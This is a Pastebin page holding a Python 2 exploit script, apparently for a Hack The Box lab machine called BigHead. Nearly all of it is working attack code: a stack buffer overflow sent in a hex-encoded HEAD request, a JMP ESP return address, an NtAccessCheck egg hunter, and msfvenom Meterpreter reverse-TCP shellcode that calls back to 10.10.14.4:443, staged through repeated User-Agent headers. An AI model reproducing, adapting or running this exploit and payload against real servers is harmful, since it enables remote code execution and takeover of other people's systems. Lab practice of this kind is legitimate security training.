API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 10th, 2018
400
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.31 KB | None | 0 0
raw download clone embed print report
  1. from socket import socket, AF_INET, SOCK_STREAM
  2. import binascii
  3. import requests
  4. import time
  5.  
  6. # reversing the code -> we enter the vulnerable code if
  7. # len(req) <= 219
  8. # s = "HEAD / HTTP/1.1\r\n\r\n"
  9. # print len(s)
  10. # 19
  11. # so we have 200 bytes
  12. # function4, leave at address: 0040194C
  13.  
  14. # Egg hunter using NtAccessCheck
  15. # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
  16. #my $egghunter =
  17. #"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
  18. #"\x77\x30\x30\x74". # this is the marker/tag: w00t
  19. #"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  20.  
  21. # egg hunter using NtDisplayString
  22. #my $egghunter =
  23. #"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
  24. #"w00t".
  25. #"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  26.  
  27. PWND = "\x50\x57\x4e\x44" # string "PWND"
  28.  
  29. # NtAccessCheck
  30. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
  31. egghunter += PWND
  32. egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  33.  
  34. # we have ESP pointing after EIP, and EAX pointing at the start of the buffer
  35. # !mona find -s "\xff\xe4" -m bHeadSvr.dll
  36. JMP_ESP = "\xF0\x12\x50\x62"
  37. #JMP_EAX = "\xF2\x12\x50\x62"
  38.  
  39. # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=443 EXITFUNC=process -f python -b '\x00\x0a\x0d\xff' -v shellcode
  40. # 368 bytes
  41. egg = PWND + PWND
  42. shellcode = egg
  43. shellcode += "\xd9\xc2\xd9\x74\x24\xf4\xba\x8a\x1f\x9e\x85\x5f"
  44. shellcode += "\x31\xc9\xb1\x56\x31\x57\x18\x83\xc7\x04\x03\x57"
  45. shellcode += "\x9e\xfd\x6b\x79\x76\x83\x94\x82\x86\xe4\x1d\x67"
  46. shellcode += "\xb7\x24\x79\xe3\xe7\x94\x09\xa1\x0b\x5e\x5f\x52"
  47. shellcode += "\x98\x12\x48\x55\x29\x98\xae\x58\xaa\xb1\x93\xfb"
  48. shellcode += "\x28\xc8\xc7\xdb\x11\x03\x1a\x1d\x56\x7e\xd7\x4f"
  49. shellcode += "\x0f\xf4\x4a\x60\x24\x40\x57\x0b\x76\x44\xdf\xe8"
  50. shellcode += "\xce\x67\xce\xbe\x45\x3e\xd0\x41\x8a\x4a\x59\x5a"
  51. shellcode += "\xcf\x77\x13\xd1\x3b\x03\xa2\x33\x72\xec\x09\x7a"
  52. shellcode += "\xbb\x1f\x53\xba\x7b\xc0\x26\xb2\x78\x7d\x31\x01"
  53. shellcode += "\x03\x59\xb4\x92\xa3\x2a\x6e\x7f\x52\xfe\xe9\xf4"
  54. shellcode += "\x58\x4b\x7d\x52\x7c\x4a\x52\xe8\x78\xc7\x55\x3f"
  55. shellcode += "\x09\x93\x71\x9b\x52\x47\x1b\xba\x3e\x26\x24\xdc"
  56. shellcode += "\xe1\x97\x80\x96\x0f\xc3\xb8\xf4\x47\x20\xf1\x06"
  57. shellcode += "\x97\x2e\x82\x75\xa5\xf1\x38\x12\x85\x7a\xe7\xe5"
  58. shellcode += "\x9c\x6d\x18\x39\x26\xfd\xe6\xba\x56\xd7\x2c\xee"
  59. shellcode += "\x06\x4f\x84\x8f\xcd\x8f\x29\x5a\x7b\x91\xbd\x6f"
  60. shellcode += "\x71\x9f\x39\x18\x87\x9f\x40\x63\x0e\x79\x12\xc3"
  61. shellcode += "\x40\xd6\xd3\xb3\x20\x86\xbb\xd9\xaf\xf9\xdc\xe1"
  62. shellcode += "\x7a\x92\x77\x0e\xd2\xca\xef\xb7\x7f\x80\x8e\x38"
  63. shellcode += "\xaa\xec\x91\xb3\x5e\x10\x5f\x34\x2b\x02\x88\x23"
  64. shellcode += "\xd3\xda\x49\xc6\xd3\xb0\x4d\x40\x84\x2c\x4c\xb5"
  65. shellcode += "\xe2\xf2\xaf\x90\x71\xf4\x50\x65\x43\x8e\x67\xf3"
  66. shellcode += "\xeb\xf8\x87\x13\xeb\xf8\xd1\x79\xeb\x90\x85\xd9"
  67. shellcode += "\xb8\x85\xc9\xf7\xad\x15\x5c\xf8\x87\xca\xf7\x90"
  68. shellcode += "\x25\x34\x3f\x3f\xd6\x13\x43\x38\x28\xe1\x6c\xe1"
  69. shellcode += "\x40\x19\x2d\x11\x90\x73\xad\x41\xf8\x88\x82\x6e"
  70. shellcode += "\xc8\x71\x09\x27\x40\xfb\xdc\x85\xf1\xfc\xf4\x48"
  71. shellcode += "\xaf\xfd\xfb\x50\x40\x87\x74\x66\xa1\x78\x9d\x03"
  72. shellcode += "\xa2\x78\xa1\x35\x9f\xae\x98\x43\xde\x72\x9f\x5c"
  73. shellcode += "\x55\xd6\xb6\xf6\x95\x44\xc8\xd2"
  74.  
  75. host = "10.10.10.112"
  76. port = 80
  77. header_host = "dev.bighead.htb"
  78. #host = "127.0.0.1"
  79. #port = 8080
  80. #header_host = "127.0.0.1"
  81.  
  82. print "[+] Stage 1: sending shellcode"
  83. h = {'User-Agent': shellcode, 'Content-Encoding': None, 'Accept-Encoding': None, 'Accept': None, 'Connection': 'close'}
  84. for i in range(0, 4):
  85.     print "[*] req " + str(i) + " sent"
  86.     #r = requests.post("http://" + header_host + "/", headers=h, data=shell)
  87.     r = requests.get("http://" + header_host + "/", headers=h)
  88.     print "> " + str(len(r.text))
  89.     time.sleep(1)
  90.  
  91. print "[+] Stage 2: exploit"
  92.  
  93. EIP_OFFSET = 72/2
  94. BUF_FILL = 120/2
  95.  
  96. buf = "\x41"*EIP_OFFSET
  97. buf += JMP_ESP
  98. buf += egghunter
  99.  
  100. for i in range(0,1):
  101.     sock = socket(AF_INET, SOCK_STREAM)
  102.     sock.connect((host, port))
  103.     sock.send("HEAD /" + binascii.hexlify(buf) + " HTTP/1.1\r\nHost: " + header_host + "\r\nConnection: close\r\n\r\n")
  104.     print "[*] req " + str(i) + " sent"
  105.     print "> " + sock.recv(1024)
  106.     sock.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!